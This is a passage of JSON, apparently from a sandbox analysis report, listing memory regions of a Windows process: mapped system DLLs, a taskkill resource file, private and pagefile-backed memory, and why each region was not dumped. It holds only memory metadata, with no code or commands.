"filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3766", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:30.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787645951, "entry_point": 1787433941, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3767", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:30.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787695777, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3768", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:30.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787793407, "entry_point": 1787762086, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3769", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:30.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787822080, "type": "region", "version": 1 }, "end_va": 1787891711, "entry_point": 1787826944, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3770", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787822080, "timestamp": "00:01:30.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3771", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:30.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3772", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:30.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3773", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:30.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3774", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:30.339", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3775", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:30.339", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3776", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:30.340", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3777", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:30.340", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3778", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:30.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3779", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:30.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3780", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:30.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3781", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:30.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3782", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:30.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3783", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:30.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3784", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:30.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3785", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:30.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3786", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:30.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3787", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:30.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3788", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:30.345", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3789", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:30.345", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3790", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:30.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3791", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:30.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3792", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:30.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3793", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:30.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3794", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:30.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7700479, "entry_point": 0, "filename": null, "id": "region_3795", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:01:30.357", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3796", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:30.357", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3797", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:30.358", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3798", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:30.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3799", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:30.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3800", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:30.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3801", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:30.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3802", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:30.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_3803", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:30.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_3804", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:30.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 3801088, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3805", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3801088, "timestamp": "00:01:30.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 8060927, "entry_point": 0, "filename": null, "id": "region_3806", "name": "private_0x0000000000770000", "norm_filename": null, "region_type": "private_memory", "start_va": 7798784, "timestamp": "00:01:30.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8323072, "type": "region", "version": 1 }, "end_va": 8585215, "entry_point": 0, "filename": null, "id": "region_3807", "name": "private_0x00000000007f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8323072, "timestamp": "00:01:30.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 10883071, "entry_point": 0, "filename": null, "id": "region_3808", "name": "pagefile_0x00000000008e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9306112, "timestamp": "00:01:30.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 31916031, "entry_point": 0, "filename": null, "id": "region_3809", "name": "pagefile_0x0000000000a70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10944512, "timestamp": "00:01:30.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3810", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:30.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3811", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:30.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_3812", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:30.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3813", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:30.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3814", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:30.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 32964607, "entry_point": 0, "filename": null, "id": "region_3815", "name": "private_0x0000000001e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 31916032, "timestamp": "00:01:30.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33882112, "type": "region", "version": 1 }, "end_va": 34144255, "entry_point": 0, "filename": null, "id": "region_3816", "name": "private_0x0000000002050000", "norm_filename": null, "region_type": "private_memory", "start_va": 33882112, "timestamp": "00:01:30.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3817", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:30.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_3818", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:30.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34144256, "type": "region", "version": 1 }, "end_va": 37089279, "entry_point": 34144256, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3819", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34144256, "timestamp": "00:01:30.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 37814271, "entry_point": 0, "filename": null, "id": "region_3820", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:01:30.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3821", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:30.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3822", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:30.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3823", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:30.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3824", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:30.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_3825", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 